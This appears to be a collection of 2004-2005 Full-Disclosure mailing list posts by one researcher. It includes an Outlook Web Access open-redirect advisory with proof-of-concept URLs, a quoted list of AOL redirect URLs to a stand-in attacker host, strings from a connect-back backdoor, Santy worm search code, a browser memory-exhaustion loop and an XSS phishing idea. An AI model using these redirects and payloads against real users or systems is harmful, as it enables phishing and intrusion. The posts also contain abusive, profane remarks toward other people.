Re: [Full-Disclosure] Multiple vulnerabilities in TrackerCam 5.12

2005-02-19 Thread morning_wood
the NDA was with a private vendor
what they do with my info is their business

 On Fri, 2005-02-18 at 14:57, morning_wood wrote:
  great job...
  this had been discovered by myself over a year ago,
  but was only released as a internal to a project
  i was under an NDA when i discovered it
 
 And they did nothing about it for a full year?
 
 -- 
 404 [EMAIL PROTECTED]
 Textbox Networks
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Multiple vulnerabilities in TrackerCam 5.12

2005-02-18 Thread morning_wood
great job...
this had been discovered by myself over a year ago,
but was only released as a internal to a project
i was under an NDA when i discovered it

cheers,
Donnie
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] google getting attacks; anybody got this? --i got it.

2005-02-11 Thread morning_wood
From: Gaurav Kumar [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 1:50 AM
Subject: [Full-Disclosure] google getting attacks;anybody got this? --i got
it.


 google is detecting if search contains
 inurl:member.php?action=viewpromember= -- myphp forum attack.



kiddies are as kiddies do
grow up and stop using canned exploits and google searching
btw... hope you rot like E2-Labs you backstabbing motherf*uckers

cheers,
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] google getting attacks; anybody got this? --igot it.

2005-02-11 Thread morning_wood
yes... too bad he cant read...

m.w
- Original Message - 
From: Polarizer [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 3:05 AM
Subject: Re: [Full-Disclosure] google getting attacks; anybody got
this? --igot it.


 This is nothing new. Was mentioned here already 06/01/2005. Read on here

 http://lists.netsys.com/pipermail/full-disclosure/2005-January/030610.html

 The Polarizer

 polarizers at its best
 http://www.codixx.de/polarizer.html
 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] netdde during update

2005-02-08 Thread morning_wood
while netdde is not started by default.
I did just notice netdde does run during
Windows update...

this would allow a window of opportunity
to exploit the service. a worm using the
netdde exploit could take advantage of
this before the user fully updates.

just noticing,

Donnie Werner
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] re: Microsoft Outlook Web Access URL Injection

2005-02-07 Thread morning_wood
looks like MS is NOT publicly releasing a fix for this, while they have the
means and solution at hand.
( at least under IE )
a kind reader sent this little snippet...

... was able to get Microsoft to provide us with a DLL
to drop under IIS 6 to compare URL variable against the Host: header
variable and do 302 to web root if they are not similar.  This fixed the
problem, however, I doubt that Microsoft will make this patch available to
the public.

what happend to MS commitment to security???


ugg,

m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Microsoft Outlook Web Access URL Injection Vulnerability

2005-02-06 Thread morning_wood

 - EXPL-A-2005-001 exploitlabs.com Advisory 030 -

- Microsoft Outlook Web Access -



OVERVIEW

A vulnerability in Microsoft Outlook Web Access allows malicious
attackers to redirect the login to any URL they wish.
This allows the attacker to force the user to the site of the
attackers choosing enabling the attacker to use social engenering
and phishing style of attacks.


AFFECTED PRODUCTS
=
Microsoft Outlook Web Access ( OWA )
Windows 2003


DETAILS
===
By using specialy crafted URL an attacker can cause the user
to redirected to an arbitrary URL to the end user.


ATTACK PROFILE
==
An attacker could gather known user email address for a company
that uses OWA. By appending an obfuscated redirected url with a
encoded url such as

https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/

this will take the user to http://example.com when the login box
is pressed, and a user is more likely to trust the url.
This would be used to send a link to the trusted login.
The attacker can then have a page to capture the user / password
and redirect back to the original login page or some other form of
phishing attack ( or other trusted URL attacks )


SOLUTION

Microsoft was contacted on Jan 20, 2005
NO patch has been produced to correct the vulnerability.
They have issued the following: on Jan 21, 2005
( see VENDOR RESPONSE )
This release is dated Jan 25, 2007


PROOF OF CONCEPT


1.https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]

2.
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe]

click login


after injection into the form, the source reveals...

BODY scroll=AUTO bgColor=#3D5FA3 text=#00 leftMargin=0
topMargin=0
FORM action=/exchweb/bin/auth/owaauth.dll method=POST
name=logonForm
autocomplete=off
INPUT type=hidden name=destination
value=http://[otherhost/file.exe];
INPUT type=hidden name=flags value=0
TABLE id=borderTable class=standardTable cellSpacing=0
cellPadding=0
height=100% width=100% bgColor=#3D5FA3 border=0

note:
the [otherhost] may easily be obfuscated so as to not alarm the targeted
user(s) such as
 https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/
( http://example.com )


notes:
example 1 redirects the user to a url of the attackers choosing.
example 2 prompts the user to download an executable or other file.
 this could be used in conjunction with the aforementioned attack scenario.


CREDITS
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs.com

Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]
-- 
Web: http://exploitlabs.com
 http://zone-h.org



VENDOR RESPONSE
===

researcher inital:
--
Dear Microsoft,
 The following discusses a potential security vulnerability affecting
one of your products. We are bringing it to your attention in order to
assist you in investigating it and determining the appropriate actions,
and have provided preliminary information about the potential
vulnerability below. Please read our disclosure policy, available at
http://www.exploitlabs.com/disclosure-policy.html if you have any
questions.
Please confirm using the contact information I have provided below that
you have received this note.

We look forward to working with you,

Exploitlabs Research Team

Donnie Werner
[EMAIL PROTECTED]


vendor response 1
-
Hello Donnie,

Thanks very much for contacting us. We have investigated reports of this
behavior in the past and plan to fix it in the next major release of
Exchange. Please let me know if you have further questions.

Thanks,
Christopher, CISSP


researcher initial 2

Christopher,
when is the next major release of Exchange due?
I think it may be in the interest of admins to know this
flaw exists, and to possibly alert thier users of potential
phishing attacks and to help secure their systems.
Exchange 2003 OWA is used extensivly in corporate
environments, where this flaw will have the most impact
being this is a moderate remote threat, this researcher
feels that PUBLIC FULL DISCLOSURE is needed.
possibly MS would be willing to issue a statement to
the public regarding this issue at this time.

regards,

Donnie Werner ( no fancy letters )

vendor response 2
-
(none)
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Is there a 0day vuln in this phisher's site?

2005-01-30 Thread morning_wood
if you mean http://www.exploitlabs.com/urlbar.html ...
then I sent MS an advisory of this... they are working on a patch.
funny... i just noticed my first PoC of this is dated 08/27/04

( http://www.kb.cert.org/vuls/id/490708 ) is dated 2001 !!!


MS response #1
Thank you for sending this report.  We're currently investigating this
issue, however it looks to be a duplicate of other UI spoofing issues
that have been posted.  For reference please see the below:

http://freehost07.websamba.com/greyhats/dlwinspoof-menu.htm

We've worked to address this update in XPSP2 by default in the Internet
Zone, and the option exists to enable this mitigation for other zones
via the registry or group policy.  Please let me know if you issue is a
separate vulnerability from the one listed above.

MS response #2
Donnie,

Thank you for the explanation.  I've been doing more research, and it seems
that while the proof-of-concept you've provided is different than the one
from Greyhats I sent earlier, it still seems that this is a known issue
originally discovered by Georgi Guninski and Andrew Clover.  I've found a
US-CERT Alert on the malicious use of chromeless windows to spoof UI linked
below and a CVE entry.  I think this is the same issue, if its not please
let me know the difference and I apologize for the confusion.

We are tracking this issue and working to resolve it.  So far the first
public fix for this is in XPSP2.  You may also look at the Windows Server
2003 SP1 Release Candidate as that should include the mitigations for this
issue as well.

http://www.kb.cert.org/vuls/id/490708
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1410


soo...


So have I. Not to diminish the importance of the attack, but this
assumes the default placement of Address Bar if I'm not mistaken, so if
the user changes their toolbar layout the popup will give itself away,
correct?

possibly yes... tested
1. win2k ie6 default bar position  - YES
2. winXPsp1 ie6 non default bar position - locked - YES
3. winXPsp2 ie6 default bar position - NO

my example provided is different in effect than the MS provided
PoC link, but they use the same type of coding


cheers,

Donnie Werner







___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] NAT router inbound network traffic subversion

2005-01-28 Thread morning_wood
scenario...

NAT client browses web...
NAT client initates a HTTP request to do this...
ROUTER returns the request to NAT client...
( normal activity )

attacker website exploits client browser...
exploit drops and executes badfile.exe
badfile.exe hooks iexplore.exe...

badfile.exe is 'reverse connecting trojan'...
badfile.exe initiates a HTTP  request to do this...
attacker's badfile.exe' 'client' is waiting with a HTTP server...

the new hooked browser initiates a HTTP request to the attacker.
NAT client is now connected to the attacker
through the ROUTER ( kinda like browsing the web huh? )
attacker now has unrestricted packet via the NAT client,
that is where ??? BEHIND YOUR ROUTER

atacker now can do a he wishes to the rest of your network
( GAME OVER )


Cheers,
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote codeexecution

2005-01-27 Thread morning_wood
 I don't have the time to investigate the cgi and dc binaries.
 The cgi at least tries to daemonize and opens a TCP listening socket.
 They also try to replace the index page on the vulnerable site.

cgi
1495   1495  0   /dev/tty
149E   149E  0   socket
14AA   14AA  0   listen
14C0   14C0  0   PsychoPhobia Backdoor is starting...

254E   254E  0   init.c


dc
09C0   09C0  0   Welcome to Data Cha0s Connect Back Shell
09E9   09E9  0   No More Damn Issue Commands
0A20   0A20  0   Data Cha0s Connect Back Backdoor
0A42   0A42  0   /bin/sh
0A4D   0A4D  0   XTERM=xterm
0A59   0A59  0   HISTFILE=
0A63   0A63  0   SAVEHIST=
0A6D   0A6D  0   Usage: %s [Host] port
0A86   0A86  0   [*] Dumping Arguments
0A9C   0A9C  0   [*] Resolving Host Name
0AB4   0AB4  0   [*] Connecting...
0AC6   0AC6  0   [*] Spawning Shell
0AD9   0AD9  0   [*] Detached

4321   4321  0   dc-connectback.c


cheers,
m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] New Santy-Worm attacks *all* PHP-skripts

2005-01-06 Thread morning_wood
 The relevant code:
 -
 $procura = 'inurl:*.php?*=' . $numr;

 for($n=0;$n900;$n += 10){
 $sock = IO::Socket::INET-new(PeerAddr = www.google.com.br, PeerPort =
 80, Proto = tcp) or next;
 print $sock GET /search?q=$procurastart=$n HTTP/1.0\n\n;
nothing new here...
unless... we try the L337 G00GLE HAX0R S34RCH STR!NGZ
http://www.google.com/search?q=inurl:*.php%3F*%3Dhl=enlr=newwindow=1start=90sa=N

BUT !!!  LIES !!! LIES I SAY 
GOOGLE IS TELLING ME I AM INFECTED ( lmfao )

--- / SNIP /--
and it appears that your computer or network has been infected
---/ SNIP /--

WRONG ANSWER WRONG EXPLAINATION WRONG JUST WRONG

We're sorry...
.. but we can't process your request right now. A computer virus or spyware
application is sending us automated requests, and it appears that your
computer or network has been infected.
We'll restore your access as quickly as possible, so try again soon. In the
meantime, you might want to run a virus checker or spyware remover to make
sure that your computer is free of viruses and other spurious software.
We apologize for the inconvenience, and hope we'll see you again on Google.




bleh,  now i need to find a new best friend... GOOGLE LIED :(
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Windows (XP SP2) Remote code executionwithparameters

2005-01-06 Thread morning_wood
 hhctrl.ocx is not installed by default in all SP1s but is on all SP2.
 Therefore when the exploit page tries to create the object he cannot
 find it so it tries to install it. On SP2 it exists by default therefore
 created silently.

i replied to this because of this statement by the O.P..

Any system running any Microsoft Windows XP edition with Internet Explorer
6
or higher, even with SP2 applied.
this suggests that all XP are affected by default, including sp2.

cheers,

m.w

p.s. I have noticed that the final pre-release of SP2 is much better ( in my
experience )
performance and security wise. ( and it retains raw sockets ). In SP2rc2,
IE6 popup
blocker stopped the PoC at default settings.
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] AOL website redirection scripts allow for abuse

2005-01-06 Thread morning_wood
i think there is many like this
http://g.msn.com/0AD00014/?http://google.com
http://g.msn.com/0AD00014/?http://example.com
etc etc etc
your examples actually use an on-site URL redir
and i recall some from yahoo as well used extensivly for spam
im quite sure they ( AOL ) knows about this , and is a purpose
built feature.

my 2 bits,

m.w

- Original Message - 
From: Michel Blomgren [EMAIL PROTECTED]
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Sent: Sunday, December 26, 2004 9:43 AM
Subject: [Full-Disclosure] AOL website redirection scripts allow for abuse



   tigerteam.se security advisory - TSEAD-200412-1
   www.tigerteam.se

  Advisory: Hole in AOL's redirection scripts allow for abuse.
  Date: Sat Dec 18 02:29:52 EST 2004
   Application: AOL's redir, redir.adp, clickThruRedirect.adp, and
frame.adp scripts.
 Vulnerability: Lack of input filtering allows for redirection abuse.
 Reference: TSEAD-200412-1
Author: Xavier de Leon [EMAIL PROTECTED]


 SYNOPSIS

 http://www.corp.aol.com/whoweare/mission.shtml


 VULNERABILITY

 The scripts in question allow input from external resources without
 validation  or filtering of any sort. Thus allowing spammers, phishers,
and
 other potential attackers a greater deceptive advantage.

 On another note, it is widely known that AOL utilizes a rating system
 (throttling)  on Instant Messages and e-mails  based on content;
specifically
 spam. However, with  the domain prefix aol.com|.* in the mix, rating
doesn't
 seem to be quite effective. And that enables spammers and phishers access
to
 spread their content around while bypassing certain throttling rates.


 COMMENT

 In an environment where AOL users are being phished constantly via Instant
 Messenger or e-mail, people are being outwitted into giving up sensitive
 credentials by clicking on arbitrary links. This is where the stated
 vulnerabily steps in.

 Although the redirection attacker host can be seen from the url itself, it
can
 be easily hex'd. Example:


http://dynamic.aol.com/cgi/redir?http://%77%77%77%2e%74%69%67%65%72%74%65%61%6d%2e%73%65
 (redirects to www.tigerteam.se)

 [ or http://dynamic.aol.com/cgi/redir?http://tigerteam.se ]

 From the example above, one must note that the http://; protocol text
must be
 included or else the script redirects to ./ (in this case being /cgi/)

 Once redirected, the attacker host will be seen on the address bar.


 DISCOVERY

 Xavier de Leon [EMAIL PROTECTED]

 While looking randomly through the AOL pages, I spotted a call to the
'redir'
 script.  I entered a bogus url and it redirected without any error
messages
 whatsoever.

 I searched several search engines (google/vivisimo/yahoo) for pages within
AOL
 which made calls to scripts with 'edir' in their name, and ran into the
 clickThruRedirect.adp and redir.adp scripts. It turns out they both
had
 the same problem. Upon such results, I began furthur research into the
 situation.


 EXPLOITATION

 http://dynamic.aol.com/cgi/redir?http://www.attacker.com

http://aolsvc.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://content.alerts.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com
 http://www.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://sinbad.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://www.shopping.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://ht-brands.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://aolreseau.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://phileas.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://publish.groups.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://shop.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://www.aolatschool.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://webcenter.shop.aol.com/ams/clickThruRedirect.adp?0,0,http://www.attacker.com

http://findajob.aol.com/ams/clickThruRedirect.adp?0,0x0,http://attacker.com
 http://expressions.aol.com/redir.adp?_dci_url=http://www.attacker.com
 http://www.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://attacker.com

http://entertainment.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
 http://redirect.aol.ca/cgi/redir-complex?sid=0url=http://www.attacker.com
 http://news.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
 http://travel.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com

http://www.defidumarche.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://shop.aolcanada.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com
 http://finance.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
 http://women.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com


Re: [Full-Disclosure] IE sp2 and Mozilla Firefox DoS.

2004-12-28 Thread morning_wood
even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

-- / snip / --
var big_string = double me up!;
while (true)
{
big_string = big_string + big_string;   // 20 iterations equals all your
memory...
}
- / snip / 

kinda funny... unpatched too!
cheers,
m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Cross-Site Scripting - an industry-wide problem

2004-12-24 Thread morning_wood
quite commom, funny because xss can be used in PHISHING attacks.
instead of alert blah try some html redirects to a hosted site with a fake
login
spoofing the original content ( a login page ) and capture username/password
then pass them to the real login page.
or better yet... xss dos attacks, like.
[script]
alert(oh no)
;window.close()
[/script]

but i guess xss is just kiddi play... or is it?

m.w


 Cross-Site Scripting - an industry-wide problem
 ===

 In early december i started a series of tests to find Cross-Site Scripting
 (XSS) vulnerabilities. It quickly turned out that the majority of all
major
 websites suffer some kind of XSS. This is a disclosure of 175
 vulnerabilities at once. Enjoy the ride...

 Test scenario
 =

 A site was considered affected if it is possible to inject a javascript
into
 the output page by making a browser GET or POST request to the webserver.
As
 a proof-of-concept the script alert(document.cookie) got used.

 All tests were made on a fully patched WinXP SP2 machine and Internet
 Explorer 6. Most of the proof-of-concept links in this report will not
work
 using another browser, mainly because in many cases i used javascript in
 styles which isn't supported by browsers like Firefox and because Firefox
 automaticly applies character encoding to a URL. I was just too lazy to
test
 each issue cross-browser, so this doesn't mean automaticly that Internet
 Explorer is more vulnerable to XSS.

 Impact
 ==

 In many cases XSS is reduced to the attack of stealing session cookies,
but
 XSS can be used to do a lot more things. Using DOM manipulation you can
 change the target of a login form or fake one, change download links or
 simply insert your own content into a website. As part of mass-mailings
this
 can be used for login data phishing, spreading of malware or distribution
of
 false news that seem to come from a trustworthy source (which is an
 intresting option for daytraders on penny stocks for example).

 Don't forget that the injected script is running in the security context
of
 the affected site. If you know who you are attacking and that the victim
has
 the affected site in a special trusted zone it can be possible to execute
 not safe for scripting ActiveX controls - giving you more or less total
 control. In intranets and for extranet web applications this is a not so
 uncommon configuration.

 For sure XSS is nothing compared to a remote buffer overflow. But only
 because this worst case scenario is happening quite often these days, it
 does not mean XSS is not a security issue. XSS flaws are easy to find and
 spammers are always searching for new stuff.

 Finally for some sites on the list dedicated to security a XSS flaw is
just
 an embarrassing thing ;)

 Affected sites
 ==

 This list is reduced to the second-level domain for readability and
posting
 size. This isn't always fair since sometimes a sub-domain is indepentend
 from the SLD. Please download the complete list of proof-of-concept links
 from http://www.mikx.de/xss.php.

 All webmasters were informed by an email and/or their website feedback
forms
 during december, to give them a fair chance to react. Some of them replied
 really quick and patched the issue in a few hours, others (sadly a lot)
 never replied. If you are responsible for one of the affected sites and
you
 have not been informed or are not able to reproduce the issue, please
don't
 hesitate to contact me.

 The sites in the tests were picked at random from international and german
 major websites and/or sites related to security/computers. I just tested
 what came to my head - so there is no hidden message:

 about.com, activestate.com, adobe.com, altavista.com, amazon.com, amd.com,
 annoyances.org, aol.com, apache.org, apple.com , archive.org, arcor.de,
 ask.com, ati.com, bahn.de, bitdefender.de, blizzard.com, blogdex.net,
 blogger.com, bloogz.com, ca.com, ccc.de, cdu.de, chip.de, ciao.de,
cert.org,
 chillingeffects.org, cnn.com, comdirect.de, consors.de, csialliance.org,
 csu.de, dell.com, daypop.com, divx.com, dooyoo.de, doubleclick.com,
 download.com, easycredit.de, ebay.com, etrade.com, evite.com, excite.com,
 fedex.com, fimatex.de, flexwiki.com, fool.com, free-av.de, freshmeat.net,
 fsf.org, fujitsu.com, gamestar.de, gm.com, gmx.net, gnu.org, go.com,
 golem.de, google.com, groupee.com, gruene-partei.de, guenstiger.de,
 heise.de, hosting.com, hp.com, ibm.com, icq.com, idealo.de,
imagemagick.org,
 infineon.com, informationsecurityireland.com, infospace.com, intel.com,
 itaa.org, izb.de, jamba.de , juno.com, kde.org, kelkoo.de, kerio.com,
 liberale.de, linspire.com, looksmart.com, lufthansa.com, lycos.com,
 macromedia.com, mandrakesoft.com, mayflower.de, mcafee.com, meetup.com,
 messagelabs.com, metacrawler.com, metadot.com, microsoft.com, mlb.com,
 mnogosearch.org, modblog.com, modssl.org, mozilla.org, mozillazine.org,
 msdn.com, msn.com, msnbc.com, nasa.gov, 

Re: [Full-Disclosure] Re: Possible apache2/php 4.3.9 worm

2004-12-22 Thread morning_wood
 Below are some examples of what an actual Santy search request would
 look like:


http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22btnG=Search

http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22t%3D2580%22btnG=Search

http://www.google.com/search?num=100hl=enlr=as_qdr=allq=allinurl%3A+%22viewtopic.php%22+%22p%3D6653%22btnG=Search

 If Google were to block this particular pattern of search request it
 would stop the spread of the worm for now.

looks like they did...
 / snip / 

Google Error

We're sorry...
.. but we can't process your request right now. A computer virus or spyware
application is sending us automated requests, and it appears that your
computer or network has been infected.
We'll restore your access as quickly as possible, so try again soon. In the
meantime, you might want to run a virus checker or spyware remover to make
sure that your computer is free of viruses and other spurious software.
We apologize for the inconvenience, and hope we'll see you again on Google.

 / snip / --

cheers,

m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] This sums up Yahoo!s security policy to a -T-

2004-12-22 Thread morning_wood
 If their refusal to release that mail even after their customer is dead is
 an indication as to their privacy practices, three cheers for Yahoo.

 Don't you get the whole slippery slope thing?  If it's ok when you're
 dead (which it's not, my stuff is my stuff...destroy it when you're sure
 I've really shuffled off elsewhere, unless I gave you very specific
 instructions otherwise) then maybe it's ok if you are in a coma...then
 maybe it's ok if you are really sick and someone else is your legal
 guardian becaue you've been declared non-compos mentis...then maybe it's
 ok if it's your parents...or your wife...or a concerned neighbor...

 What's in that mailbox is/was mine, none of your business unless I chose
 to share it.

i couldnt agree more... another case of lame, illogical media bullshit
BRAVO YAHOO

happy hollidays,

m.w
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly

2004-12-02 Thread morning_wood
I can confirm on WinXP SP1 ( download the [patch].exe run and reboot)
 Mr Wever's exploit PoC did not run ( no shell, dialog warning )

cheers,
m.w

  The IFRAME vulnerability has been patched, see
http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx

 The wording in ms04-040 is so vague, I am not entirely sure that this
 patch is a fix for the IFRAME bug(s)?

  *** Make sure you are patched after installing ***
  I installed it using Automatic Updates (on Win2ksp4), rebooted and
loaded my InternetExploiter.html: IT STILL WORKED!!
  Even though both Automatic Updates and
http://windowsupdate.microsoft.com; reported that I was patched!?!
  I manually downloaded the exe and ran it, rebooted and now I'm finally
truely patched.

 Just so I am clear, after automatic updates applied the critical
 patch on W2KSP4 and rebooted, the IFRAME exploit still worked, but
 manually downloading the executable given in the Microsoft alert and
 running it results in a system on which the IFRAME exploit no longer
 works?

 This would be confirmation that ms04-040 actually does address the
 IFRAME exploit.


 Kevin

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.netsys.com/full-disclosure-charter.html


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Network Sniffing

2004-11-30 Thread morning_wood
http://sourceforge.net/projects/showtraf

showtraf.
i use this everyday, its free, easy, simple, and small ( 1 file ).

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] overburning edit of molded cdroms feasible?

2004-11-29 Thread morning_wood
.. molded cdroms..
( i assume you mean pressed cdroms like MsWindows or Doom3 that you buy)
 do you even know how they are made?!?
.. you cant burn more data on a molded cdrom, as the
reflective layer is not only not burnable, but never was burnt to begin
with.
but thanks for playing!!!

mabey a better idea is hard drives and usb thumbdrives,
how about some floppys!!! or mabey cover the anti-record
tabs on some audio cassettes, record over some Britney with
some Megadeath or.. nevermind.
*sigh*

m.w

p.s. next time please do some research...
http://www.google.com/search?hl=enq=how+pressed+cdroms+are+made
http://www.burnworld.com/cdr/primer/

- Original Message - 
From: Saber Taylor [EMAIL PROTECTED]
Subject: [Full-Disclosure] overburning edit of molded cdroms feasible?


 Scenario: chinese agent buys molded cdroms from stores
 in Washington D.C. and overburns new data along the
 same spiral with a specialized cdrom drive. Returns
 the cdroms to the story which then re-shrinkwraps and
 puts back on the shelf. 1.) Is this possible? 2.)
 Could firmware automatically do a quick check for
 this?

 Thanks.

 [EMAIL PROTECTED]

  __
 Do you Yahoo!?
^^ no, and stop asking me

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Network Security in India

2004-11-24 Thread morning_wood
then there was this little diddy...

HYDERABAD: The hacker is on the prowl and the government can do little to
stop him in his tracks. At least, that's what the IT department - custodian
of the government web sites and servers ...

http://timesofindia.indiatimes.com/articleshow/320561.cms

cheers,
D.W



___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] For your pleasure

2004-11-17 Thread morning_wood
oh?
-
08/23/2001  05:00 AM   354,468 wmpaud1.wav
( bintext output )
00056862   00056862  0   INFOICRD
0005686E   0005686E  0   2000-04-06
00056882   00056882  0   Deepz0ne
00056894   00056894  0   Sound Forge 4.5
-
..heh

 Guys,

 For your pleasure:
 http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php

 I know, it is in French, but here is my translation, it deserves to be
known.

 Digging into Windows XP Operating Systems, the journalists of PC Welt
 discovered the following text at the end of the files presents into the
 C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory:

 [see the picture at the link]

 You have to know that DeepzOne is the nickname of a founding member of the
 Radium cracking group created in 1997 and especialized into the craking of
 sound oriented software.

 To say it another way, the Microsoft guy who created these files used a
 cracked version of the SoundForce program.

 Even if it is probable the Redmond giant has a license of this program
 (400$), it looks bad to see this when we are hearing everywhere about the
 Microsoft anti-piracy policy...

 Laurent LEVIER
 Systems  Networks Security Expert, CISSP CISM

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] media-motor.net

2004-11-15 Thread morning_wood
file is a MSVB exe, here are some fun strings from the binary...
( spyware, but not a trojan )

http://www.maxmind.com:8010/a?l=PeAyF1sgrZYwi=\tempf.txt
\usta32.ini
http://mmm.media-motor.net/bundle.php?aff=\affbun.txt
  phases
  sewers
  outers
c:\asdf.txt
randomdll
mydll
randomocx
 \regsvr32 /s 
 randomexe
myexe
 SOFTWARE\Microsoft\Windows\CurrentVersion\Run
  uinstaller
  unstall.exe
 SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\media-motor
  DisplayName
  Media-motor
\unstall.exe
http://logs.media-motor.net/log3.php?c=what=newinstallaff=country=
 \tempf2.txt
what=dupinstallaff=

 anyone familiar with this group (media-motor.net/Roings.com) ? they
 seem to be sending downloader.trojan files to unsuspecting people
 using everyone.net webmail accounts.
 http://mmm.media-motor.net/soft/default.exe
 the webmail i discovered it on was from sunguru.com

 tries to download that file everytime i log in or log out.?
proally using IE huh?

fun stuff,
m.w

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] MSIE IFRAME and FRAME tag NAME property bufferoverflow PoC exploit (was: python does mangleme (with IE bugs!))

2004-11-02 Thread morning_wood
bindshell success ( html run from local )
connect from remote success...
this is NASTY
if shellcode modified this will do reverse or exe drop i assume

good work,

Donnie Werner

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Slightly off-topic: www.georgewbush.com

2004-10-30 Thread morning_wood
Obviously not many of you Americans ( which I am )
 travel to Europe much do you.

You fail to see, and therefore cannot comprehend the attitude of many
Europeans
about the attitudes of the American government ( f*cking with other parts of
the
 world ) for peace and freedom when it is about OIL. I am not anti
American...
meerly observant.

can we kill this topic now? ( its rather pointless )

m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Slashdot: Gmail Accounts Vulnerable to XSS Exploit

2004-10-30 Thread morning_wood
there is a [x] box..

Don't ask for my password for 2 weeks.

this sets the users cookie. Gmail uses the cookie for authentication.


XSS holes are not (as we all know) an immediate bypass for
 any authentication.
right

It can be used, with a bit of work, to steal
 cookies/authentication data from unexpecting users, NOT as an immediate
 break-into-accounts kiddie tool.
right

 However, the interesting thing I found about this article was this line:
 regardless of whether or not the password is subsequently changed

 Does Gmail use some sort of static security key?
 Does anyone have any further details on the security implemented by Google
 in their new service?
see above.


m.wood

___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Hacking into private files, my credit card purchases, personal correspondence or anything that is mine is trespassing and criminal.

2004-10-08 Thread morning_wood
phood 4 th0ugh7,

last i heard being on the internet was voluntary...
